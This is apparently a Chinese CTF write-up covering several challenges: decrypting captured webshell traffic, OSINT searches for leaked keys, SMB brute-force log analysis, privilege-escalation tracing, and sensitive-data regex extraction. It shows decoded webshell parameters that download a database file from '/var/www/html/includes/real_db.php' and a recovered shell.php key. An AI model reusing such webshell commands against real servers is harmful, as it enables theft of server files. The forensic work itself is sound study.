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

解密后关键代码：

$mode="ZG93bmxvYWQ=";$mode=base64_decode($mode);$path="L3Zhci93d3cvaHRtbC9pbmNsdWRlcy9yZWFsX2RiLnBocA==";

再base64编码：

$mode="download";$mode=base64_decode($mode);$path="/var/www/html/includes/real_db.php";

我们查看返回，发现返回包并不能通过aes解密，而后直接使用base64编码转换，这里字数太多，贴不上去了，刚刚直接崩溃了，最难受的就是公众号崩了，csdn也崩了，而且只能预览不能修改不能转发了，气不气吧？？？

先进行base64编码

在进行16进制转换即可

第三题和第四题没做出来，直接出第五题了

这个地方我没解开，队友解开了
通过获取的shell.php的密钥 05c1cc9c2deafb75 利用脚本解密第203个分组包，获得一串base64编码的字符串

账号泄密追踪

第一个小题，是从github搜索
搜索green berry，定位源码类型为python的工程

翻阅文件，查找到key

第二小题，gitee

Gitee平台为国内平台，先尝试拼音

翻阅文件，检索key

第三小题

语雀为国内平台，优先检索拼音，限定时间半年内


第四小题

知乎搜索qingmei


第五小题

BlueTeam

第一题，题干给的是一些系统日志、监控的进程信息以及一个流量包

我们打开系统安全日志，通过检索4624/4625登录事件发现，ming用户的爆破时间点与登录事件点一一对应，可以确定，是ming用户异常
首先检索登录失败日志，将事件限制在6.27即可

我们不难发现，在21:21这个时间段内明显存在暴力破解现象，攻击者利用SMB协议进行暴力破解攻击，并且于21:21:32爆破最后一次并成功停止爆破

我们再查看对应的登录成功日志，发现ming用户的确是21:21:32登录成功

第二题没答上来，试了一下第一次登录成功的ip地址，也试了第一次攻击的ip地址，都失败了，也就没浪费太多时间

第三题

我们使用ProcessMonitor工具打开题干给的Logfile.PML文件
通过浏览进程信息，此处开始查询权限，判断在此时间点前进行了提权

向上找垃圾，发现疑似使用word文件进行提权(猜测缓冲区溢出漏洞)

往前翻发现下载了很多的文件helper.doc

​最后这道题就这么写了，我也没找到为什么是这个文件进行溢出提权

第四题

非常规软件对各类办公文件进行检索，判断为最终提权后文件

第五小题

承上启下

sneakshot

下载好之后，是一张图片，并且是iphone14拍摄的

最后用了ps也没行，能看出来有个水印，于是乎回头用手机打开，调节参数信息，例如亮度、对比度、柔和度等，终于挑出来，能看了

敏感数据识别

我们先看题干



打开试题，是一个80+MB的txt文件，我们需要提取我们所需要的信息

​此时我们除了写脚本，并没有太好的办法，这里以队长老王的脚本为例，为啥不用我的，因为我写的没人家写的规范
此处以python脚本为例

根据手机号、imei、银行卡限制要求，制定匹配list

IP匹配

邮箱匹配

手机号匹配

Imei匹配

银行卡号匹配

读取文件匹配即可，就不演示了

剩下的题也没来得及做，简单web题第一题只能做出来一半，就不写了；
第二题其实是github上的源码，通过更改setcookie即可达到越权的效果，但是并没做出来，菜是原罪

https://github.com/PanJiaChen/vue-element-admin/issues/587

其实还想做刮刮乐那道题的，但是最后实在是头疼，三个好兄弟一商量，在五点结束了继续做题的想法

​还是有收获的